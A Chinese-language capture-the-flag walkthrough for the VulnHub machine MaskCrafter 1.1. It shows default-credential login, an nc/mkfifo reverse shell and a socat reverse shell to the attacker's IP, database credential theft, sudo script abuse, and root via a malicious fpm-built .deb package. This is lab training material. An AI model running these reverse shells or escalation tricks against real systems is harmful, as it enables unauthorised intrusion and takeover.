MASKCRAFTER: 1.1

靶机地址:https://www.vulnhub.com/entry/maskcrafter-11,445/

攻击机ip:192.168.99.128
靶机ip:192.168.99.145

获取靶机开放的端口

FTP存在匿名登录,并获取到了两个文件

查看NOTES.txt,/debug目录下可能存在其他东西,并且用户名是admin

 

访问 /debug ,用admin/admin登录成功

页面是命令执行

用burp抓包,丢个反弹shell进去(需要url编码)

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.99.128 1234 >/tmp/f

进入系统之后找到数据库的用户密码

 

进入数据库

mysql -uweb -pP@ssw0rdweb
show databases;
use mydatabase
show tables;
select * from creds;

 

获得压缩包密码 cred12345!!,解压获得新的用户和密码

直接SSH连接登录

ssh userx@192.168.99.145 

查看sudo权限,可以以evdaez身份运行/scripts/whatsmyid.sh

 修改/scripts/whatsmyid.sh 文件内容,切换成evdaez用户

 

现在可以以researcherx身份运行socat

根据这个提权网站的信息,可以用socat来做一个反弹shell

攻击上执行 socat file:`tty`,raw,echo=0 tcp-listen:12345
靶机执行 sudo -u researcherx socat tcp-connect:192.168.99.128:12345 exec:/bin/sh,pty,stderr,setsid,sigint,sane

执行之后,将可以获得一个 researcherx 身份的shell

下一步就是提权了

 

在kali上执行以下命令,将生成一个可以获得/bin/sh的恶意文件(我的kali没有fpm命令,sudo gem install fpm

TF=$(mktemp -d)
echo 'exec /bin/sh' > $TF/x.sh
fpm -n x -s dir -t deb -a all --before-install $TF/x.sh $TF

用python临时搭一个web服务器,靶机用wget接收文件

然后执行,获得root权限

原文地址:https://www.cnblogs.com/gaonuoqi/p/14963583.html